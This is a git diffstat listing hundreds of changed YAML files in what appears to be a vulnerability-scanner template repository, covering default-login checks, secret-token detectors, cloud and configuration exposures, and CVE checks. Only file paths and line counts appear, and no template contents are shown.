poc/auth/lucee-login-8665.yaml | 24 - poc/auth/lutron-iot-default-login-8675.yaml | 27 + poc/auth/lutron-iot-default-login-8676.yaml | 6 + poc/auth/lutron-iot-default-login-8678.yaml | 31 - poc/auth/lutron-iot-default-login.yaml | 7 +- poc/auth/mailchimp-api-key-8722.yaml | 20 +- poc/auth/mailchimp-api-key-8726.yaml | 20 - .../mantisbt-default-credential-8778.yaml | 59 +- poc/auth/meshcentral-login-8801.yaml | 21 - poc/auth/meshcentral-login-8803.yaml | 21 + poc/auth/mongodb-unauth-8925.yaml | 22 - poc/auth/mongodb-unauth-8928.yaml | 15 +- poc/auth/mysql-native-password-8981.yaml | 5 +- poc/auth/mysql-native-password.yaml | 21 +- poc/auth/nagios-default-login-8990.yaml | 44 + poc/auth/nagios-default-login-8994.yaml | 31 - poc/auth/netgear-router-auth-bypass-9025.yaml | 28 - poc/auth/netgear-router-auth-bypass.yaml | 28 + poc/auth/netscaler-aaa-login.yaml | 21 +- poc/auth/netsus-default-login-9060.yaml | 46 - poc/auth/netsus-default-login.yaml | 33 + poc/auth/netsus-server-login-9061.yaml | 20 + poc/auth/netsus-server-login-9062.yaml | 20 - poc/auth/nexus-default-login-9088.yaml | 11 +- poc/auth/nexus-default-login-9089.yaml | 16 +- poc/auth/nps-default-login-9145.yaml | 54 - poc/auth/nuuno-network-login-9164.yaml | 20 + ...gin-9162.yaml => nuuno-network-login.yaml} | 0 poc/auth/oauth-access-key-9186.yaml | 22 + poc/auth/oauth2-detect-9181.yaml | 32 - poc/auth/oauth2-detect-9182.yaml | 51 +- poc/auth/octobercms-default-login-9192.yaml | 65 - poc/auth/octobercms-default-login.yaml | 59 + poc/auth/ofbiz-default-credentials.yaml | 4 +- poc/auth/ofbiz-default-login-9210.yaml | 40 - poc/auth/ofbiz-default-login-9211.yaml | 9 + poc/auth/open-stack-dashboard-login-9321.yaml | 21 + poc/auth/open-stack-dashboard-login-9322.yaml | 22 - poc/auth/open-stack-dashboard-login-9323.yaml | 2 +- poc/auth/openemr-default-login-9270.yaml | 6 +- poc/auth/openemr-default-login.yaml | 43 - poc/auth/openwrt-default-login.yaml | 13 +- poc/auth/oracle-opera-login.yaml | 38 + poc/auth/panabit-default-login-9438.yaml | 12 +- poc/auth/panabit-default-login-9440.yaml | 26 +- .../panabit-ixcache-default-login-9443.yaml | 14 +- poc/auth/panabit-ixcache-default-login.yaml | 30 + poc/auth/panos-default-login-9454.yaml | 18 +- poc/auth/panos-default-login-9455.yaml | 34 + poc/auth/panos-default-login.yaml | 42 + poc/auth/paypal-braintree-token(1).yaml | 16 + poc/auth/paypal-braintree-token-11856.yaml | 13 - poc/auth/paypal-braintree-token.yaml | 4 - poc/auth/pentaho-default-login-9477.yaml | 14 +- poc/auth/pentaho-default-login-9478.yaml | 33 - poc/auth/pentaho-default-login-9480.yaml | 42 + poc/auth/phabricator-login.yaml | 20 +- poc/auth/pictatic-api-key-9576.yaml | 5 +- poc/auth/pictatic-api-key.yaml | 4 - poc/auth/pieregister-open-redirect-9577.yaml | 13 +- poc/auth/pieregister-open-redirect-9579.yaml | 4 +- .../pieregister-plugin-open-redirect.yaml | 10 +- poc/auth/pinpoint-unauth-9588.yaml | 13 +- poc/auth/pinpoint-unauth-9590.yaml | 27 - poc/auth/plastic-scm-login.yaml | 19 +- poc/auth/polycom-login-9625.yaml | 20 - poc/auth/polycom-login-9627.yaml | 21 + poc/auth/polycom-login.yaml | 19 +- poc/auth/possible-AEM-secrets.yaml | 46 - poc/auth/private-key-9655.yaml | 3 - poc/auth/project-insight-login.yaml | 18 +- poc/auth/pure-storage-login.yaml | 18 +- ...=> putty-private-key-disclosure-9730.yaml} | 0 poc/auth/r-webserver-login.yaml | 22 +- poc/auth/rabbitmq-default-login-9783.yaml | 12 +- poc/auth/rabbitmq-default-login-9786.yaml | 12 +- .../rails-secret-token-disclosure-9809.yaml | 22 - .../rails-secret-token-disclosure-9810.yaml | 23 + poc/auth/rails-secret-token-disclosure.yaml | 3 +- poc/auth/rainloop-default-login-9811.yaml | 19 +- poc/auth/rainloop-default-login.yaml | 44 + poc/auth/rancher-default-login-9814.yaml | 11 +- poc/auth/rancher-default-login-9815.yaml | 12 +- poc/auth/ranger-default-login-9827.yaml | 39 + poc/auth/ranger-default-login-9828.yaml | 15 +- poc/auth/ricoh-weak-password-9880.yaml | 9 +- poc/auth/ricoh-weak-password-9882.yaml | 11 +- poc/auth/rockmongo-default-login-9897.yaml | 47 + poc/auth/rockmongo-default-login-9899.yaml | 11 +- ...gin-9908.yaml => routeros-login-9909.yaml} | 0 poc/auth/routeros-login.yaml | 25 - poc/auth/rseenet-default-login-9913.yaml | 9 + poc/auth/rseenet-default-login-9914.yaml | 6 +- poc/auth/ruijie-eg-password-leak-9922.yaml | 39 - poc/auth/ruijie-eg-password-leak.yaml | 8 +- poc/auth/saferoads-vms-login-9971.yaml | 17 - poc/auth/saferoads-vms-login-9973.yaml | 16 + poc/auth/saferoads-vms-login.yaml | 18 +- .../samsung-wlan-default-login-10018.yaml | 45 + poc/auth/sangfor-edr-auth-bypass-10022.yaml | 33 +- poc/auth/sangfor-edr-auth-bypass.yaml | 29 - ...gin-10089.yaml => sauter-login-10091.yaml} | 0 poc/auth/sauter-login.yaml | 22 +- poc/auth/seats-login-10104.yaml | 19 - poc/auth/seats-login.yaml | 3 +- poc/auth/seeddms-default-login-10125.yaml | 16 +- poc/auth/seeddms-default-login-10127.yaml | 20 +- poc/auth/sendgrid-api-key-10140.yaml | 2 +- poc/auth/sequoiadb-default-login-10150.yaml | 17 +- poc/auth/server-backup-login-10153.yaml | 19 + poc/auth/server-backup-login-10156.yaml | 20 - poc/auth/server-backup-login.yaml | 24 +- ...server-backup-manager-se-login-detect.yaml | 25 +- ...ervice-pwd.yaml => service-pwd-10176.yaml} | 0 poc/auth/service-pwd-10178.yaml | 16 +- poc/auth/servicedesk-login-panel-10172.yaml | 22 - poc/auth/servicedesk-login-panel.yaml | 15 +- poc/auth/sgp-login-panel-10182.yaml | 3 +- poc/auth/sgp-login-panel.yaml | 21 +- poc/auth/sharecenter-login-10190.yaml | 1 + poc/auth/shopify-custom-token(1).yaml | 16 + poc/auth/shopify-custom-token-10198.yaml | 13 - poc/auth/shopify-custom-token-11860.yaml | 5 +- poc/auth/shopify-private-token-11861.yaml | 16 - poc/auth/shopify-private-token.yaml | 5 +- poc/auth/shoppable-token-10206.yaml | 5 +- poc/auth/shoppable-token-10209.yaml | 16 + poc/auth/shoppable-token.yaml | 16 + poc/auth/showdoc-default-login-10221.yaml | 14 +- ...10298.yaml => sitefinity-login-10297.yaml} | 0 poc/auth/sitefinity-login.yaml | 12 +- poc/auth/siteomat-login-10300.yaml | 19 - poc/auth/siteomat-login-10301.yaml | 19 + poc/auth/siteomat-login-10303.yaml | 3 +- poc/auth/slack-bot-token-10310.yaml | 5 +- poc/auth/slack-bot-token-10312.yaml | 18 + poc/auth/slocum-login-10317.yaml | 4 + poc/auth/slocum-login.yaml | 17 +- poc/auth/smartsense-default-login-10330.yaml | 12 +- poc/auth/smartsense-default-login-10331.yaml | 9 +- poc/auth/solar-log-authbypass-10352.yaml | 39 - poc/auth/solar-log-authbypass.yaml | 27 + poc/auth/solarwinds-default-login-10355.yaml | 47 - poc/auth/solarwinds-default-login-10356.yaml | 16 +- poc/auth/somfy-login-10371.yaml | 18 + poc/auth/somfy-login-10373.yaml | 18 - poc/auth/sonarqube-token-10380.yaml | 15 - poc/auth/sonarqube-token-10382.yaml | 9 +- poc/auth/spark-webui-unauth-10401.yaml | 26 + poc/auth/spark-webui-unauth.yaml | 15 +- poc/auth/sphider-login-10407.yaml | 22 - poc/auth/sphider-login-10408.yaml | 4 +- poc/auth/sphider-login-10409.yaml | 21 + poc/auth/sphider-login.yaml | 23 +- poc/auth/splunk-enterprise-login-panel.yaml | 23 +- poc/auth/splunk-enterprise-login-panel.yml | 22 - poc/auth/splunk-login-10416.yaml | 24 + poc/auth/square-access-token(1).yaml | 17 - poc/auth/square-access-token-11867.yaml | 14 + poc/auth/square-access-token.yaml | 3 + poc/auth/ssh-authorized-keys-10523.yaml | 22 +- .../stem-audio-table-private-keys-10535.yaml | 22 + .../stem-audio-table-private-keys-10536.yaml | 27 - poc/auth/stem-audio-table-private-keys.yaml | 9 +- poc/auth/stripe-api-key(1).yaml | 16 + poc/auth/stripe-api-key-11869.yaml | 13 - poc/auth/stripe-restricted-key-10553.yaml | 2 +- poc/auth/stripe-restricted-key.yaml | 15 + poc/auth/submitty-login-10568.yaml | 31 - poc/auth/submitty-login.yaml | 15 +- poc/auth/supermicro-default-login-10572.yaml | 11 +- poc/auth/supermicro-default-login.yaml | 36 + poc/auth/superset-default-login-10574.yaml | 13 +- poc/auth/superset-default-login.yaml | 8 + poc/auth/symantec-dlp-login-10596.yaml | 21 - ...601.yaml => symantec-epm-login-10599.yaml} | 0 poc/auth/symantec-ewep-login-10605.yaml | 7 +- poc/auth/symantec-ewep-login-10606.yaml | 3 +- poc/auth/szhe-default-login-10636.yaml | 10 +- ...gin.yaml => szhe-default-login-10638.yaml} | 0 .../telecom-gateway-default-login-10686.yaml | 14 +- poc/auth/telecom-gateway-default-login.yaml | 33 + poc/auth/tidb-unauth-10770.yaml | 23 + poc/auth/tidb-unauth-10772.yaml | 26 - poc/auth/tomcat-default-login-10791.yaml | 2 +- poc/auth/tomcat-default-login.yaml | 76 + poc/auth/tracer-sc-login.yaml | 21 +- poc/auth/twitter-secret-10862.yaml | 3 +- poc/auth/twitter-secret.yaml | 4 + poc/auth/ucmdb-default-login-10868.yaml | 3 +- poc/auth/ucmdb-default-login-10871.yaml | 41 + ...in-10869.yaml => ucmdb-default-login.yaml} | 0 poc/auth/unauth-ftp-10939.yaml | 13 +- poc/auth/unauth-ftp-10942.yaml | 18 - poc/auth/unauth-hoteldruid-panel-10943.yaml | 39 - poc/auth/unauth-hoteldruid-panel.yaml | 25 + poc/auth/unauth-message-read-10947.yaml | 37 +- poc/auth/unauth-spark-api-10963.yaml | 14 +- poc/auth/unauth-spark-api.yaml | 30 - poc/auth/unauth-wavink-panel-10967.yaml | 48 + poc/auth/unauth-xproxy-dashboard-10968.yaml | 23 - poc/auth/unauth-xproxy-dashboard-10969.yaml | 27 + poc/auth/unauth-xproxy-dashboard.yaml | 4 - poc/auth/unauthenticated-airflow-10884.yaml | 27 + poc/auth/unauthenticated-airflow-10886.yaml | 23 - poc/auth/unauthenticated-airflow.yaml | 12 +- .../unauthenticated-alert-manager-10888.yaml | 3 +- .../unauthenticated-alert-manager-10892.yaml | 23 - poc/auth/unauthenticated-frp-10895.yaml | 21 + poc/auth/unauthenticated-frp-10896.yaml | 5 + poc/auth/unauthenticated-frp-10897.yaml | 26 - poc/auth/unauthenticated-glowroot-10900.yaml | 13 +- poc/auth/unauthenticated-glowroot-10902.yaml | 8 +- poc/auth/unauthenticated-influxdb-10903.yaml | 27 + poc/auth/unauthenticated-influxdb.yaml | 6 +- poc/auth/unauthenticated-jenkins.yaml | 50 +- poc/auth/unauthenticated-mongo-express.yaml | 23 + .../unauthenticated-nacos-access-10912.yaml | 40 + .../unauthenticated-nacos-access-10915.yaml | 35 - poc/auth/unauthenticated-nacos-access.yaml | 6 + poc/auth/unauthenticated-netdata.yaml | 11 +- .../unauthenticated-popup-upload-10921.yaml | 21 + ...yaml => unauthenticated-popup-upload.yaml} | 0 poc/auth/unauthenticated-prtg-10924.yaml | 20 - poc/auth/unauthenticated-prtg-10927.yaml | 21 + poc/auth/unauthenticated-zipkin.yaml | 26 - poc/auth/unauthenticated-zippkin.yaml | 5 + .../unauthorized-h3csecparh-login-10948.yaml | 34 - poc/auth/unauthorized-h3csecparh-login.yaml | 29 + poc/auth/unauthorized-hp-printer-10951.yaml | 20 + poc/auth/unauthorized-plastic-scm-10956.yaml | 17 +- poc/auth/unauthorized-plastic-scm-10957.yaml | 49 - ...ized-puppet-node-manager-detect-10958.yaml | 20 + ...ized-puppet-node-manager-detect-10959.yaml | 24 - ...authorized-puppet-node-manager-detect.yaml | 9 +- poc/auth/versa-default-login-11003.yaml | 21 +- poc/auth/versa-default-login-11004.yaml | 29 +- poc/auth/vidyo-default-login-11009.yaml | 52 - ...in.yaml => vidyo-default-login-11010.yaml} | 0 poc/auth/vigor-login-11020.yaml | 19 + poc/auth/vigor-login-11023.yaml | 20 - poc/auth/vigor-login.yaml | 19 +- poc/auth/visionhub-default-login-11026.yaml | 42 + poc/auth/visionhub-default-login-11027.yaml | 12 +- poc/auth/vpms-auth-bypass-11066.yaml | 33 + poc/auth/vpms-auth-bypass-11068.yaml | 32 - ...tchguard-credentials-disclosure-11107.yaml | 16 +- ...=> watchguard-credentials-disclosure.yaml} | 0 poc/auth/weblogic-weak-login-11154.yaml | 68 - poc/auth/weblogic-weak-login-11155.yaml | 14 +- poc/auth/whm-login-detect.yaml | 22 +- poc/auth/wifisky-default-password-11205.yaml | 38 - poc/auth/wifisky-default-password.yaml | 16 +- ...ordpress-infinitewp-auth-bypass-11287.yaml | 21 +- ...ordpress-infinitewp-auth-bypass-11288.yaml | 60 - poc/auth/wordpress-login.yaml | 16 +- poc/auth/wordpress-updraftplus-pem-key.yaml | 12 +- .../wordpress-weak-credentials-11336.yaml | 43 + .../wordpress-weak-credentials-11337.yaml | 37 - poc/auth/wordpress-weak-credentials.yaml | 17 +- poc/auth/wpdm-cache-session-11436.yaml | 23 + poc/auth/wpdm-cache-session-11438.yaml | 24 - poc/auth/wso2-default-login.yaml | 38 - poc/auth/xenforo-login-11674.yaml | 17 - poc/auth/xenmobile-login-11675.yaml | 19 + poc/auth/xenmobile-login-11677.yaml | 20 - poc/auth/xenmobile-login.yaml | 19 +- poc/auth/xerox7-default-login-11679.yaml | 21 +- poc/auth/xerox7-default-login.yaml | 46 + poc/auth/xvr-login-11704.yaml | 8 +- poc/auth/xvr-login-11705.yaml | 20 + poc/auth/xxljob-default-login-11709.yaml | 53 - poc/auth/xxljob-default-login-11712.yaml | 16 +- poc/auth/zabbix-default-credentials.yaml | 7 +- poc/auth/zabbix-server-login-11767.yaml | 3 +- poc/auth/zabbix-server-login-11769.yaml | 23 + poc/auth/zeroshell-login-11788.yaml | 20 + poc/auth/zeroshell-login-11790.yaml | 20 - poc/auth/zeroshell-login.yaml | 18 +- poc/auth/zhiyuan-oa-session-leak-11802.yaml | 22 + ...1801.yaml => zhiyuan-oa-session-leak.yaml} | 0 poc/auth/zhiyuan-oa-unauthorized-11806.yaml | 25 + poc/auth/zhiyuan-oa-unauthorized-11808.yaml | 26 - poc/auth/zimbra-preauth-ssrf-11810.yaml | 14 +- poc/auth/zimbra-preauth-ssrf.yaml | 20 + poc/auth/zms-auth-bypass-11830.yaml | 33 + poc/auth/zms-auth-bypass-11832.yaml | 34 - poc/auth/zoho-webhook-token-11835.yaml | 2 +- poc/aws/amazon-docker-config-280.yaml | 28 - .../amazon-docker-config-disclosure-278.yaml | 18 - poc/aws/amazon-docker-config-disclosure.yaml | 12 +- poc/aws/amazon-docker-config.yaml | 18 + poc/aws/amazon-mws-auth-token-11845.yaml | 11 +- poc/aws/amazon-mws-auth-token-282.yaml | 6 +- poc/aws/amazon-mws-auth-token-283.yaml | 11 +- poc/aws/aws-access-id-618.yaml | 16 - poc/aws/aws-access-id-620.yaml | 16 - poc/aws/aws-access-id.yaml | 11 +- poc/aws/aws-access-key-value-624.yaml | 22 + poc/aws/aws-bucket-service-628.yaml | 31 - poc/aws/aws-bucket-service.yaml | 27 + poc/aws/aws-cloudfront-service-634.yaml | 14 +- poc/aws/aws-cloudfront-service-635.yaml | 22 - poc/aws/aws-cognito-638.yaml | 32 - .../aws-ecs-container-agent-tasks-641.yaml | 25 - poc/aws/aws-elastic-beanstalk-detect-644.yaml | 7 +- poc/aws/aws-elastic-beanstalk-detect.yaml | 31 - poc/aws/aws-object-listing-646.yaml | 3 +- poc/aws/aws-object-listing.yaml | 11 +- poc/aws/aws-opensearch-login-649.yaml | 24 + poc/aws/aws-opensearch-login-650.yaml | 25 - poc/aws/aws-opensearch-login.yaml | 3 +- poc/aws/aws-redirect-651.yaml | 24 + poc/aws/aws-redirect-652.yaml | 13 +- poc/aws/awstats-config-656.yaml | 36 + poc/aws/awstats-config.yaml | 26 - poc/aws/awstats-script-657.yaml | 29 + poc/aws/awstats-script-658.yaml | 29 - poc/aws/awstats-script.yaml | 20 +- poc/aws/ec2-detection-7162.yaml | 18 - poc/aws/ec2-detection-7163.yaml | 24 + poc/aws/metadata-aws-8812.yaml | 26 +- poc/aws/metadata-aws.yaml | 41 - poc/aws/s3-bucket.yaml | 4 + poc/aws/s3-detect-9964.yaml | 19 +- poc/aws/s3-subtakeover-9968.yaml | 20 - poc/aws/s3-subtakeover-9969.yaml | 24 + poc/backup/adb-backup-enabled-60.yaml | 15 +- poc/backup/db-backup-lfi-6774.yaml | 25 - poc/backup/db-backup-lfi-6775.yaml | 30 + poc/backup/db-backup-lfi-6776.yaml | 11 +- poc/backup/db-backup-lfi.yaml | 4 - ...s-9497.yaml => php-backup-files-9498.yaml} | 0 poc/backup/php-backup-files.yaml | 127 +- poc/backup/server-backup-login-10153.yaml | 19 + poc/backup/server-backup-login-10156.yaml | 20 - poc/backup/server-backup-login.yaml | 24 +- .../server-backup-manager-se-10157.yaml | 19 - .../server-backup-manager-se-10160.yaml | 20 + ...server-backup-manager-se-login-detect.yaml | 25 +- ...s-total-upkeep-backup-download-11324.yaml} | 0 ...ordpress-total-upkeep-backup-download.yaml | 13 +- poc/backup/zip-backup-files-11818.yaml | 99 +- poc/cisco/cisco-ace-device-manager.yaml | 16 +- .../cisco-cloudcenter-suite-log4j-rce.yaml | 63 - poc/cisco/cisco-cloudcenter-suite-rce.yaml | 73 + poc/cisco/cisco-edge-340.yaml | 16 +- poc/cisco/cisco-finesse-login-938.yaml | 22 - poc/cisco/cisco-finesse-login-940.yaml | 23 + poc/cisco/cisco-integrated-login-941.yaml | 3 +- poc/cisco/cisco-meraki-exposure-944.yaml | 25 + poc/cisco/cisco-meraki-exposure-946.yaml | 26 - poc/cisco/cisco-network-config-949.yaml | 34 - poc/cisco/cisco-network-config.yaml | 24 + poc/cisco/cisco-prime-infrastructure-952.yaml | 26 - poc/cisco/cisco-prime-infrastructure-954.yaml | 26 + poc/cisco/cisco-sd-wan-955.yaml | 25 + poc/cisco/cisco-sd-wan-957.yaml | 26 - poc/cisco/cisco-secure-desktop-962.yaml | 27 - poc/cisco/cisco-security-details-963.yaml | 22 - poc/cisco/cisco-security-details.yaml | 2 +- poc/cisco/cisco-smi-exposure-970.yaml | 14 +- ...e-972.yaml => cisco-smi-exposure-971.yaml} | 0 poc/cisco/cisco-systems-login-973.yaml | 25 + poc/cisco/cisco-systems-login-975.yaml | 32 - poc/cisco/cisco-systems-login.yaml | 12 +- poc/cisco/cisco-telepresence-976.yaml | 25 + poc/cisco/cisco-telepresence-978.yaml | 25 - poc/cisco/cisco-telepresence.yaml | 4 +- ...-980.yaml => cisco-ucs-kvm-login-979.yaml} | 0 poc/cisco/cisco-ucs-kvm-login.yaml | 13 +- .../adobe-coldfusion-detect-82.yaml | 62 - .../adobe-coldfusion-detect-83.yaml | 9 +- .../adobe-coldfusion-error-detect-86.yaml | 29 + ...aml => adobe-coldfusion-error-detect.yaml} | 0 .../coldfusion-administrator-login-1145.yaml | 49 +- poc/coldfusion/coldfusion-debug-xss-1153.yaml | 31 + poc/coldfusion/coldfusion-debug-xss.yaml | 34 - .../unpatched-coldfusion-10979.yaml | 30 + poc/coldfusion/unpatched-coldfusion.yaml | 2 - poc/config/aerohive-netconfig-ui-199.yaml | 73 +- ...ui.yaml => aerohive-netconfig-ui-200.yaml} | 0 .../airflow-configuration-exposure-230.yaml | 28 + .../airflow-configuration-exposure.yaml | 16 - poc/config/amazon-docker-config-280.yaml | 28 - .../amazon-docker-config-disclosure-278.yaml | 18 - .../amazon-docker-config-disclosure.yaml | 12 +- poc/config/amazon-docker-config.yaml | 18 + poc/config/ansible-config-disclosure-326.yaml | 28 + poc/config/ansible-config-disclosure.yaml | 16 - poc/config/api-iconfinder-439.yaml | 34 + poc/config/awstats-config-656.yaml | 36 + poc/config/awstats-config.yaml | 26 - .../bigip-config-utility-detect-730.yaml | 34 + .../bigip-config-utility-detect-731.yaml | 2 +- .../bigip-config-utility-detect-732.yaml | 42 + poc/config/buffalo-config-injection-798.yaml | 30 - poc/config/buffalo-config-injection-800.yaml | 34 + poc/config/buffalo-config-injection-801.yaml | 39 + poc/config/buffalo-config-injection.yaml | 6 +- poc/config/circleci-config-923.yaml | 35 + poc/config/circleci-config-925.yaml | 3 +- poc/config/cisco-network-config-949.yaml | 34 - poc/config/cisco-network-config.yaml | 24 + poc/config/config-rb-1179.yaml | 30 + .../{config-rb-1180.yaml => config-rb.yaml} | 0 poc/config/configuration-listing-1182.yaml | 61 +- poc/config/confluence-detect-1186.yaml | 14 +- poc/config/confluence-detect-1187.yaml | 40 - poc/config/confluence-detect-1189.yaml | 41 + .../confluence-ssrf-sharelinks-1191.yaml | 31 +- .../confluence-ssrf-sharelinks-1192.yaml | 44 + .../confluence-ssrf-sharelinks-1193.yaml | 36 - poc/config/cors-misconfig-1223.yaml | 44 + poc/config/detect-drone-config-6972.yaml | 7 +- poc/config/detect-drone-config-6973.yaml | 2 +- poc/config/docker-compose-config-7059.yaml | 27 - poc/config/docker-compose-config.yaml | 26 + poc/config/dockercfg-config-7056.yaml | 6 - poc/config/dockercfg-config.yaml | 26 - poc/config/esmtprc-config-7258.yaml | 10 +- poc/config/esmtprc-config-7259.yaml | 11 +- poc/config/firebase-config-exposure.yaml | 30 - poc/config/front-page-misconfig-7547.yaml | 25 + .../{ftpconfig.yaml => ftpconfig-7565.yaml} | 0 poc/config/ftpconfig-7566.yaml | 13 +- poc/config/git-config-7635.yaml | 14 + poc/config/git-config-7636.yaml | 19 +- ...l => git-config-nginxoffbyslash-7628.yaml} | 0 .../git-config-nginxoffbyslash-7630.yaml | 35 + poc/config/github-page-config-7654.yaml | 30 + .../gocd-cruise-configuration-7748.yaml | 27 - .../grandstream-device-configuration.yaml | 9 +- ....yaml => honeywell-scada-config-7990.yaml} | 0 poc/config/honeywell-scada-config-7992.yaml | 25 - poc/config/htaccess-config-8043.yaml | 26 + poc/config/httpd-config-8055.yaml | 34 + poc/config/httpd-config.yaml | 24 - poc/config/joomla-config-file-8376.yaml | 10 +- poc/config/joomla-config-file-8377.yaml | 12 +- poc/config/keycloak-openid-config-8475.yaml | 39 - poc/config/keycloak-openid-config.yaml | 25 + poc/config/magento-config-disclosure.yaml | 50 - ...02.yaml => misconfigured-docker-8900.yaml} | 0 poc/config/misconfigured-docker.yaml | 10 +- poc/config/msmtp-config-8967.yaml | 42 + poc/config/nginx-config-9098.yaml | 26 +- ...inx-config.yaml => nginx-config-9099.yaml} | 0 poc/config/parameters-config-9465.yaml | 38 - poc/config/parameters-config.yaml | 32 + poc/config/prometheus-config-9673.yaml | 37 + poc/config/prometheus-config-endpoint.yaml | 19 +- poc/config/prometheus-config.yaml | 27 - poc/config/rconfig-rce-9834.yaml | 20 +- poc/config/samba-config-9987.yaml | 34 - poc/config/samba-config.yaml | 20 + poc/config/springboot-autoconfig.yaml | 25 - poc/config/springboot-configprops-10442.yaml | 42 + poc/config/symfony-database-config-10615.yaml | 13 +- poc/config/symfony-database-config-10616.yaml | 17 - ...aml => symfony-database-config-10617.yaml} | 0 poc/config/tcpconfig.yaml | 19 + poc/config/tugboat-config-exposure-10842.yaml | 32 - ...aml => tugboat-config-exposure-10843.yaml} | 0 .../wamp-server-configuration-11096.yaml | 20 - poc/config/web-config-11125.yaml | 24 - .../wordpress-accessible-wpconfig-11235.yaml | 38 - .../wordpress-accessible-wpconfig-11238.yaml | 12 +- poc/config/wordpress-git-config-11278.yaml | 26 - poc/config/wordpress-git-config-11279.yaml | 16 +- poc/config/wp-config-setup.yaml | 15 +- poc/config/wpengine-config-check.yaml | 22 - poc/config/zend-config-file-11778.yaml | 37 + poc/config/zend-config-file-11779.yaml | 22 - poc/crlf_injection/crlf-injection-1262.yaml | 29 + poc/crlf_injection/crlf-injection-1263.yaml | 6 +- poc/crlf_injection/crlf-injection-1264.yaml | 51 +- .../csrfguard-detect-1291.yaml | 17 +- ...detect-1290.yaml => csrfguard-detect.yaml} | 0 poc/cve/CNVD-2020-23735.yaml | 23 +- poc/cve/CNVD-2020-56167.yaml | 20 +- poc/cve/CNVD-2021-14536.yaml | 13 +- poc/cve/CNVD-2021-17369.yaml | 11 +- poc/cve/CNVD-2021-26422.yaml | 29 + poc/cve/CNVD-2021-30167.yaml | 22 +- poc/cve/CVE-2000-0114.yaml | 28 +- poc/cve/CVE-2002-1131.yaml | 35 +- poc/cve/CVE-2007-4504.yaml | 5 - poc/cve/CVE-2008-6222.yaml | 29 +- poc/cve/CVE-2008-6668.yaml | 37 +- poc/cve/CVE-2009-1151.yaml | 32 +- poc/cve/CVE-2009-1496.yaml | 29 +- poc/cve/CVE-2009-2015.yaml | 28 +- poc/cve/CVE-2009-2100.yaml | 12 +- poc/cve/CVE-2009-3053.yaml | 28 +- poc/cve/CVE-2010-0943.yaml | 28 +- poc/cve/CVE-2010-0972.yaml | 24 +- poc/cve/CVE-2010-0982.yaml | 26 +- poc/cve/CVE-2010-1056.yaml | 28 +- poc/cve/CVE-2010-1302.yaml | 2 - poc/cve/CVE-2010-1305.yaml | 8 +- poc/cve/CVE-2010-1307.yaml | 8 +- poc/cve/CVE-2010-1308.yaml | 24 +- poc/cve/CVE-2010-1312.yaml | 27 +- poc/cve/CVE-2010-1313.yaml | 27 +- poc/cve/CVE-2010-1314.yaml | 25 +- poc/cve/CVE-2010-1315.yaml | 26 +- poc/cve/CVE-2010-1345.yaml | 28 +- poc/cve/CVE-2010-1352.yaml | 25 +- poc/cve/CVE-2010-1353.yaml | 4 +- poc/cve/CVE-2010-1469.yaml | 24 +- poc/cve/CVE-2010-1470.yaml | 24 +- poc/cve/CVE-2010-1474.yaml | 28 +- poc/cve/CVE-2010-1491.yaml | 26 +- poc/cve/CVE-2010-1494.yaml | 26 +- poc/cve/CVE-2010-1532.yaml | 25 +- poc/cve/CVE-2010-1540.yaml | 6 +- poc/cve/CVE-2010-1657.yaml | 15 +- poc/cve/CVE-2010-1658.yaml | 27 +- poc/cve/CVE-2010-1659.yaml | 4 +- poc/cve/CVE-2010-1714.yaml | 28 +- poc/cve/CVE-2010-1715.yaml | 27 +- poc/cve/CVE-2010-1717.yaml | 25 +- poc/cve/CVE-2010-1718.yaml | 27 +- poc/cve/CVE-2010-1858.yaml | 26 +- poc/cve/CVE-2010-1953.yaml | 27 +- poc/cve/CVE-2010-1981.yaml | 26 +- poc/cve/CVE-2010-1982.yaml | 26 +- poc/cve/CVE-2010-2682.yaml | 25 +- poc/cve/CVE-2010-2920.yaml | 25 +- poc/cve/CVE-2010-3203.yaml | 24 +- poc/cve/CVE-2010-4239.yaml | 33 +- poc/cve/CVE-2010-4617.yaml | 25 +- poc/cve/CVE-2010-5028.yaml | 27 +- poc/cve/CVE-2010-5278.yaml | 36 +- poc/cve/CVE-2011-2744.yaml | 27 +- poc/cve/CVE-2011-3315.yaml | 28 +- poc/cve/CVE-2012-0896.yaml | 4 +- poc/cve/CVE-2012-0981.yaml | 26 +- poc/cve/CVE-2012-4273.yaml | 30 +- poc/cve/CVE-2012-4768.yaml | 30 +- poc/cve/CVE-2013-5528.yaml | 23 +- poc/cve/CVE-2013-5979.yaml | 5 - poc/cve/CVE-2013-6281.yaml | 33 +- poc/cve/CVE-2013-7240.yaml | 26 +- poc/cve/CVE-2014-1203.yaml | 22 +- poc/cve/CVE-2014-2962.yaml | 30 +- poc/cve/CVE-2014-4561.yaml | 26 +- poc/cve/CVE-2014-4940.yaml | 25 +- poc/cve/CVE-2014-4942.yaml | 32 +- poc/cve/CVE-2014-9606.yaml | 21 +- poc/cve/CVE-2014-9609.yaml | 19 +- poc/cve/CVE-2015-0554.yaml | 4 - poc/cve/CVE-2015-1880.yaml | 43 +- poc/cve/CVE-2015-2166.yaml | 23 +- poc/cve/CVE-2015-3306.yaml | 42 +- poc/cve/CVE-2015-4050.yaml | 30 +- poc/cve/CVE-2015-5471.yaml | 23 +- poc/cve/CVE-2015-6544.yaml | 36 +- poc/cve/CVE-2015-7780.yaml | 33 +- poc/cve/CVE-2016-1000126.yaml | 29 +- poc/cve/CVE-2016-1000128.yaml | 26 +- poc/cve/CVE-2016-1000132.yaml | 21 +- poc/cve/CVE-2016-1000134.yaml | 21 +- poc/cve/CVE-2016-1000143.yaml | 26 +- poc/cve/CVE-2016-1000146.yaml | 28 +- poc/cve/CVE-2016-1000154.yaml | 27 +- poc/cve/CVE-2016-1000155.yaml | 28 +- poc/cve/CVE-2016-10367.yaml | 25 +- poc/cve/CVE-2016-10940.yaml | 23 +- poc/cve/CVE-2016-7552.yaml | 28 +- poc/cve/CVE-2017-11586.yaml | 49 +- poc/cve/CVE-2017-12542.yaml | 30 +- poc/cve/CVE-2017-12794.yaml | 37 +- poc/cve/CVE-2017-14524.yaml | 39 +- poc/cve/CVE-2017-14535.yaml | 26 +- poc/cve/CVE-2017-15647.yaml | 24 +- poc/cve/CVE-2017-15944.yaml | 21 +- poc/cve/CVE-2017-17451.yaml | 28 +- poc/cve/CVE-2017-18536.yaml | 27 +- poc/cve/CVE-2017-3528.yaml | 26 +- poc/cve/CVE-2017-5521.yaml | 20 +- poc/cve/CVE-2017-5631.yaml | 26 +- poc/cve/CVE-2017-6090.yaml | 35 +- poc/cve/CVE-2017-8917.yaml | 30 +- poc/cve/CVE-2017-9805.yaml | 27 +- poc/cve/CVE-2017-9822.yaml | 28 +- 